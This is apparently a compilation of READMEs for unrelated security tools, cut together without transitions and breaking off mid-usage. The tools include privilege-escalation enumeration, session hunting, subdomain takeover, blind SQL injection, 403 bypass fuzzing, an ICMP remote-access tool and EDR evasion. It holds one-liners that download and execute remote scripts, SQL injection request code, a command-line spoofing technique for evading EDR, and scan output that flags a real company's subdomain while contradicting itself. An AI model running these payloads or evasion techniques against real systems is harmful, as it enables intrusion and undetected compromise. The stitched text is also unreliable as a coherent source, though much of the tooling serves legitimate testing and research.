If you want to deploy both stacks you can run cdk deploy --all
All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-*
pattern.
The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations
lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.
The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console
The DRS Volume Annotations DynamoDB tables keeps track of the status of each Malware scan operation.
Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan
In order to analize logs from Amazon GuardDuty Malware scan operations, you can check /aws/guardduty/malware-scan-events
Amazon Cloudwatch LogGroup. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.
Run the following commands in your terminal:
cdk destroy --all
(Optional) Delete the CloudWatch log groups associated with Lambda Functions.
For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.
Monthly Cost | Total Cost for 12 Months |
---|---|
171.22 USD | 2,054.74 USD |
Service Name | Description | Monthly Cost (USD) |
---|---|---|
AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
Amazon DynamoDB | 100MB 1 Read/Second 1 Writes/Second | 3.65 |
AWS Security Hub | 1 Account / 100 Security Checks / 1000 Finding Ingested | 0.10 |
AWS EventBridge | 1M custom events | 1.00 |
Amazon Cloudwatch | 1GB ingested/month | 0.50 |
AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
Amazon SQS | 2 SQS Fifo | 0.00 |
Total | 171.22 |
Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments is advisable to include Business Support Plan (not considered in the estimation)
See CONTRIBUTING for more information.
An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.
This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0
. See here for more information.
JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.
Release Notes:
JAW-V2
branch.JAW-V1
branch.The architecture of the JAW is shown below.
JAW can be used in two distinct ways:
Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path
.
Web Application Analysis: Analyze a web application by providing a single seed URL.
Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.
Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).
Query the constructed Neo4j
graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.
JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.
The outputs will be stored in the same folder as that of input.
The installation script relies on the following prerequisites: - Latest version of npm package manager
(node js) - Any stable version of python 3.x
- Python pip
package manager
Afterwards, install the necessary dependencies via:
$ ./install.sh
For detailed
installation instructions, please see here.
You can run an instance of the pipeline in a background screen via:
$ python3 -m run_pipeline --conf=config.yaml
The CLI provides the following options:
$ python3 -m run_pipeline -h
usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]
This script runs the tool pipeline.
optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)
Input Config: JAW expects a .yaml
config file as input. See config.yaml for an example.
Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).
For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:
$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js
This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.
JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.
This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:
$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>
The foxhoundpath
is by default set to the following directory: crawler/foxhound/firefox
which contains a binary named firefox
.
Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.
To start the crawler, do:
$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true
See here for more information.
To start the crawler, do:
$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d
Please refer to the documentation of the hpg_crawler
here for more information.
To generate an HPG for a given (set of) JavaScript file(s), do:
$ node engine/cli.js --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv
optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)
To import an HPG inside a neo4j graph database (docker instance), do:
$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h
usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]
This script imports a CSV of a property graph into a neo4j docker database.
optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)
In order to create a hybrid property graph for the output of the hpg_crawler
and import it inside a local neo4j instance, you can also do:
$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>
Specification of Parameters:
<path>
: absolute path to the folder containing the program files for analysis (must be under the engine/outputs
folder).--js=<program.js>
: name of the JavaScript program for analysis (default: js_program.js
).--import=<bool>
: whether the constructed property graph should be imported to an active neo4j database (default: true).--hybrid=bool
: whether the hybrid mode is enabled (default: false
). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.--reqs=<requests.out>
: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false
to exclude (default: request_logs_short.out
).--evts=<events.out>
: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false
to exclude (default: events.out
).--cookies=<cookies.pkl>
: for hybrid mode only, name of the file containing the cookies, pass the string false
to exclude (default: cookies.pkl
).--html=<html_snapshot.html>
: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false
to exclude (default: html_rendered.html
).For more information, you can use the help CLI provided with the graph construction API:
$ python3 -m engine.api -h
The constructed HPG can then be queried using Cypher or the NeoModel ORM.
You should place and run your queries in analyses/<ANALYSIS_NAME>
.
You can use the NeoModel ORM to query the HPG. To write a query:
example_query_orm.py
in the analyses/example
folder.$ python3 -m analyses.example.example_query_orm
For more information, please see here.
You can use Cypher to write custom queries. For this:
example_query_cypher.py
in the analyses/example
folder.$ python3 -m analyses.example.example_query_cypher
For more information, please see here.
This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering
Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:
request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]
cs_csrf:
enabled: false
# [...]
Step 2. Run an instance of the pipeline with:
$ python3 -m run_pipeline --conf=config.yaml
Hint. You can run multiple instances of the pipeline under different screen
s:
$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]
To generate parallel configuration files automatically, you may use the generate_config.py
script.
The outputs will be stored in a file called sink.flows.out
in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC']
is forgeable through the window.location
injection point. However, a request marked with ['NON-REACH']
is not forgeable.
An example output entry is shown below:
[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })
1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href
This entry shows that on line 29, there is a $.ajax
call expression, and this call expression triggers an ajax
request with the url template value of ajaxloc + "/bearer1234/
, where the parameter ajaxloc
is a program slice reading its value at line 6 from window.location.href
, thus forgeable through ['WIN.LOC']
.
In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js
web application which you can test JAW with.
First, install the dependencies via:
$ cd tests/test-webapp
$ npm install
Then, run the application in a new screen:
$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'
For more information, visit our wiki page here. Below is a table of contents for quick access.
Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.
If you use the JAW for academic research, we encourage you to cite the following paper:
@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}
JAW has come a long way and we want to give our contributors a well-deserved shoutout here!
@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.
First, a couple of useful oneliners ;)
wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh
Note that since version 2.10
you can serve the script to other hosts with the -S
flag!
Linux enumeration tools for pentesting and CTFs
This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.
Unlike LinEnum, lse
tries to gradualy expose the information depending on its importance from a privesc point of view.
This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.
From version 2.0 it is mostly POSIX compliant and tested with shellcheck
and posh
.
It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p
parameter.
It has 3 levels of verbosity so you can control how much information you see.
In the default level you should see the highly important security flaws in the system. The level 1
(./lse.sh -l1
) shows interesting information that should help you to privesc. The level 2
(./lse.sh -l2
) will just dump all the information it gathers about the system.
By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.
The idea is to get the information gradually.
First you should execute it just like ./lse.sh
. If you see some green yes!
, you probably have already some good stuff to work with.
If not, you should try the level 1
verbosity with ./lse.sh -l1
and you will see some more information that can be interesting.
If that does not help, level 2
will just dump everything you can gather about the service using ./lse.sh -l2
. In this case you might find useful to use ./lse.sh -l2 | less -r
.
You can also select what tests to execute by passing the -s
parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro
will execute the test usr010
and all the tests in the sections net
and pro
.
Use: ./lse.sh [options]
OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.
Also available in webm video
Direct execution oneliners
bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i
ShellSweeping the evil
"ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.
ShellSheep and it's suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of encrypted or obfuscated codes often found in webshells. - It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells. - Certain directories can be excluded from scanning. - Files with certain hashes can be ignored during the scan.
Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".
When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).
If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower. In the context of finding webshells or malicious files, entropy can be a useful indicator: - Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random. - A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.). So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.
ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by: - Counting how often each character appears in the file. - Using these frequencies to calculate the probability of each character. - Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.
ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.
Pass ShellScan.ps1 some directories of webshells, any size set. I used:
This will give a decent training set to get entropy values.
Output example:
Statistics for .aspx files:
Average entropy: 4.94212121048115
Minimum entropy: 1.29348709979974
Maximum entropy: 6.09830238020383
Median entropy: 4.85437969842084
Statistics for .asp files:
Average entropy: 5.51268104400858
Minimum entropy: 0.732406213077191
Maximum entropy: 7.69241278153711
Median entropy: 5.57351177724806
First, let's break down the usage of ShellCSV and how it assists with identifying entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.
See ShellCSV.csv as example output.
First, choose your flavor: Python, PowerShell or Lua.
If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.
Feel free to open a Git issue.
If you enjoyed this project, be sure to star the project and share with your family and friends.
Retrieve and display information about active user sessions on remote computers. No admin privileges required.
The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.
If the -CheckAdminAccess
switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)
It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')
If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry
Invoke-SessionHunter
Gather sessions by authenticating to targets where you have local admin access
Invoke-SessionHunter -CheckAsAdmin
You can optionally provide credentials in the following format
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"
You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.
This works in cobination with -Timeout | Default = 2, increase for slower networks.
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5
Use the -Match switch to show only targets where you have admin access and a privileged user is logged in
Invoke-SessionHunter -Match
All switches can be combined
Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match
Invoke-SessionHunter -Domain contoso.local
Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt
Invoke-SessionHunter -Servers
Invoke-SessionHunter -Workstations
Invoke-SessionHunter -Hunt "Administrator"
Invoke-SessionHunter -IncludeLocalHost
Invoke-SessionHunter -RawResults
Note: if a host is not reachable it will hang for a while
Invoke-SessionHunter -NoPortScan
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.
Download from releases
Build from source:
$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go
Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)
./Subhunter -l subdomains.txt -o test.txt
____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|
A fast subdomain takeover tool
Created by Nemesis
Loaded 88 fingerprints for current scan
-----------------------------------------------------------------------------
[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable
Subhunter exiting...
Results written to test.txt
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester
and override the request
method. Also, the method must determine whether the query resolved to True
or False
.
import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor
class. It requires a DBMS
object to contruct queries and a Requester
object to inject them. Hakuin currently supports SQLite
, MySQL
, PSQL
(PostgreSQL), and MSSQL
(SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS
interface defined in hakuin/dbms/DBMS.py
.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies
& headers
from the request. - Easiest way to authenticate for your requests
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah¶m2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah¶m2=blah2"
Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>
Specify -H "header: value"
for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more it will automatically mute it.
Repeats are changeable in the code until I add an option to specify it in flag
NOTE: Can't be used simultaneously with -hc
or -hl
(yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
Download the binaries
or build the binaries and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....
) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.
Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.
lolbin.exe " " * sizeof(real arguments)
Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory
Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)
nimble install winim
Programs that clear or change the previous printed console messages (such as timeout.exe 10
) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
bash pip3 install sqlmc
Run sqlmc
with the following command-line arguments:
-u, --url
: The URL to scan (required)-d, --depth
: The depth to scan (required)-o, --output
: The output file to save the resultsExample usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
This project is licensed under the GNU Affero General Public License v3.0.
BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.
Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.
Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.
docker build .
dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev
pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9
# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path
positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze
optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
